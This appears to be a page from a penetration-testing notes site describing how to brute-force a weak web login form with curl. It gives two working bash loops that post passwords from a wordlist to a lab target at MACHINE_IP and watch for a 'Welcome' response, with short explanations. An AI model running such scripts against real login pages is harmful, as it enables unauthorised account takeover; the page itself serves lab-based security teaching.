BRUTE FORCING W/ CURL

This method automates logins and performs brute force using cURL against a weak login form

root@oco:~$ nano passwords.txt
 admin123
 password
 letmein
 secretpass
 secret
 
root@oco:~$ nano loop.sh
 #This works only if passwords contain no spaces; It will break on whitespace or special characters.
 #safer version is using "while IFS= read -r pass; do"
 for pass in $(cat passwords.txt); do
   echo "Trying password: $pass"
   #If a password contains special characters (&, =, +), the request may break when using the -d "username=admin&password=$pass" 
   #best to use "--data-urlencode "password=$pass""
   response=$(curl -s -X POST -d "username=admin&password=$pass" http://MACHINE_IP/bruteforce.php)
   if echo "$response" | grep -q "Welcome"; then
     echo "[+] Password found: $pass"
     break
   fi
 done
 
root@oco:~$ chmod +x loop.sh
root@oco:~$ ./loop.sh

 * $(cat passwords.txt) reads each password from the file.
 * curl -s sends the login request silently (no progress meter).
    - The response is stored in a variable.
 * grep -q checks if the response contains a success string (like “Welcome”).
    - When found, it prints the working password and exits the loop.
    
 * This exact method underpins tools like Hydra, Burp Intruder, and WFuzz. By doing it 
   manually, you understand what's happening under the hood: a repetitive HTTP POST with 
   variable data, waiting for a different response.

CLEANER VERSION

while IFS= read -r pass; do
  echo "Trying password: $pass"
  response=$(curl -s -X POST \
    --data-urlencode "username=admin" \
    --data-urlencode "password=$pass" \
    http://MACHINE_IP/bruteforce.php)

  if echo "$response" | grep -q "Welcome"; then
    echo "[+] Password found: $pass"
    break
  fi
done < passwords.txt

PreviousUSER-AGENT NextSESSION COOKIE REPLAY TESTING

Last updated 1 day ago